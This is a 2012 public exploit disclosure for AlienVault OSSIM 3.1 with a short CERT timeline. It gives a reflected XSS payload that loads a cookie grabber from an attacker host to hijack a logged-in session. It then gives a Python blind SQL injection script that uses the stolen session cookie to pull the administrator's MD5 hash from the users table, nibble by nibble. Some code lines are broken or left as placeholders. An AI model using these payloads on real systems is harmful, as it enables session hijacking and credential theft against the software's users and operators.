Alienvault Open Source SIEM (OSSIM) 3.1 – Reflected Cross-Site Scripting / Blind SQL Injection

  • 作者: muts
    日期: 2012-07-23
  • 类别:
  • 来源:
  • #!/usr/bin/python
    AlienVault has a reflected XSS vulnerability in the "url" parameter of "top.php". 
    Proof of Concept:
    Enticing a logged in user to visit the following URL where an attacker is hosting an cookie grabber will allow for the hijacking of the user session:
    https://victim/ossim/top.php?option=3&soption=3&url=<script src=http://attacker/grabber.js></script>
    With a cookie captured and a session hijacked, the blind SQL injection vulnerability in the "tcp_port" parameter of "base_qry_main.php" can be exploited to extract the admin hash.
    # 28 May 2012: Vulnerability reported to CERT
    # 30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012
    # 23 Jul 2012: Update from CERT: No response from AlienVault
    # 23 Jul 2012: Public Disclosure
    Special Thanks to Tal Zeltzer
    When we access the vulnerable script at:
    With an invalid sql statement in tcp_port[0][0] we see that there is an sql injection vulnerability
    [Todo]: Add here description on how we got the original query
    We concluded that since magic_quotes_gpc is enabled it will be difficult to obtain a shell quickly.
    We decided to take a different approach, we will modify the query in a way that it will only return rows
    If a specific field we are interested in has X as the Nth byte.
    To optimize the speed we used an algorithm called 'binary search'
    what we do is: (n being the Nth byte of the result string):
    - check if X equals n
    - If its not check if X is bigger than n
    - If its not, X is smaller than n
    We used this algorithm to extract data from files using the LOAD_FILE function
    We also used this algorithm to extract the admin MD5 hashed password
    import sys,urllib2,urllib
    # Example 
    # https://victim/ossim/forensics/base_qry_main.php?tcp_port[0][0]=1=1) and 2 = mid((select pass from ossim.users where login=0x61646d696e),1,1)--&tcp_port[0][1]=layer4_dport&tcp_port[0][2]==&tcp_port[0][3]=17500&tcp_port[0][4]= &tcp_port[0][5]= &tcp_flags[0]= &layer4=TCP&num_result_rows=-1&current_view=-1&submit=QUERYDBP&sort_order=sig_a&clear_allcriteria=1&clear_criteria=time
    target = 'https://victim/ossim/forensics/base_qry_main.php'
    cookie = 'PHPSESSID=072af2ba52959b1602cc8fa864081d01'
    debug = False
    # We use this function to output debug information if required
    def debugOut(str, newLine = True):
    if debug == True:
    if newLine == True:
    print str
    print str,
    # Injects the given sql-query and check if the results were 'True' or 'False'
    def sendSql(query):
    global target, cookie # We use the cookie and the target variables as globals
    debugOut("Query: %s" % query) # Print the query we execute for debugging
    values = { 'tcp_port[0][0]': query, # This is our injection parameter
     'tcp_port[0][1]': 'layer4_dport',
     'tcp_port[0][2]': '=',
     'tcp_port[0][3]': 17500,
     'tcp_port[0][4]': ' ',
     'tcp_port[0][5]': ' ',
     'tcp_flags[0]': ' ',
     'layer4': 'TCP',
     'num_result_rows': -1,
     'current_view': -1,
     'submit': 'QUERYDBP',
     'sort_order': 'sig_a',
     'clear_allcriteria': 1,
     'clear_criteria': 'time' }
    url = "%s?%s" % (target, urllib.urlencode(values))# Create the request url
    req = urllib2.Request(url)# Create a request for the specified url
    req.add_header('Cookie', cookie)# Add the cookie we stolen using XSS to identify ourselves
    try:# Exception handling
    response = urllib2.urlopen(req) # Send the request and save the response object
    except: # In-case of an exception
    print 'Failed to SQL inject'# Notify the user that there was an error
    sys.exit(-1)# Stop execution of our exploit
    data = Read the response data
    # If the string 'No events...' is in not in our data the query is 'True'
    return('No events matching your search criteria have been found' not in data)
    # This function enumerates the value of a single nibble out of the admin hash
    # It uses the "binary search" algorithm to narrow down the number of requests we send
    def enumerateNibble(subQuery, location, iMin = 0x00, iMax = 0x0F):
    n = (iMin + iMax) / 2 # Get the middle of our range 
    debugOut('Trying %d' % n, False)# Notify what value is we comparing the nibble to
    # Test if the current value equals the nibble 
    if sendSql('1=1) and %s = cast(conv(mid(%s,%d,1), 16, 10) as unsigned integer)--' % (n, subQuery, location)) == True:
    debugOut('Equals!') # If it is, notify 
    return(hex(n)[2:])# Return the hex representation of the nibble's value
    # Test if the current value is bigger than the nibble
    elif sendSql('1=1) and %s > cast(conv(mid(%s,%d,1),16,10) as unsigned integer)--' % (n, subQuery, location)) == True:
    debugOut('Bigger than') # If it is, notify
    return(enumerateNibble(subQuery, location, iMin, n - 1))# Use recursion to try again with the new reduced range
    else: # If the current value is smaller than the nibble
    debugOut('Smaller than')# If it is, notify
    return(enumerateNibble(subQuery, location, n + 1, iMax))# Use recursion to try again with the new reduced range
    # Do the actual enumeration of the admin-hash
    def enumerateAdminHash():
    hash = '' # Initialize the 'hash' variable
    for i in range(1,33): # Iterate from 1 to 32 (the size of the md5 hash)
    # Append the nibble we enumerate from the given query
    # (This query retrives the administrator hash (obviously..)
    hash += str(enumerateNibble('(select pass from ossim.users where login=0x61646d696e)', i))
    print 'At %d, So far: %s' % (i, hash) # Notify about our progress
    return(hash)# When done, return the hash we enumerated
    print "Trying to dump the administrator's hash"
    print "Note: If we get stuck or get invalid results it's probably due to an invalid session"
    hash = enumerateAdminHash()
    print "Administrator MD5 hash:"
    print "admin:%s" % hash